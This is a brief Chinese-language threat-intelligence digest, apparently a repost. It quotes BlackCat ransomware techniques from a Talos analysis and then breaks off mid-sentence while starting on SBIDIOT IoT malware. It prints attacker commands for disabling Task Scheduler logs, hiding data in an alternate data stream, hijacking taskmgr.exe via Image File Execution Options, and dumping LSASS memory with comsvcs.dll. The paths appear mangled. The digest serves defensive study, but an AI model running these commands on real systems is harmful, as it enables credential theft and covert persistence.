BlackCat勒索
链接:https://blog.talosintelligence.com/2022/03/from-blackmatter-to-blackcat-analyzing.html
在设置反向 ssh 计划任务工具之前,攻击者禁用了任务计划程序的日志
c:windowssystem32wevtutil.exe set-log microsoft-windows-taskscheduler/operational /enabled:false
C++实现了写入 C:目录的alternate data stream (ADS)流隐藏
c:windowssystem32windowspowershellv1.0powershell.exe -command & {(get-content c:system -raw | set-content c: -stream ‘cachetask’)}
利用镜像劫持做自启动项
c:windowssystem32reg.exe add hklmsoftwaremicrosoftwindows ntcurrentversionimage file execution optionstaskmgr.exe /v debugger /t reg_sz /d c:system
直接使用系统的comsvc??s.dll 转储 LSASS 内存
powershell rundll32.exe c:windowssystem32comsvc??s.dll, minidump (get-process lsass).id
SBIDIOT IoT 恶意软件
链接:https://brianstadnicki.github.io/posts/malware-sbidiot-dec2021/
尝试连接8.8.8.8以确保可以访问互联 。
如果有互
声明:本站部分文章及图片源自用户投稿,如本站任何资料有侵权请您尽早请联系jinwei@zod.com.cn进行处理,非常感谢!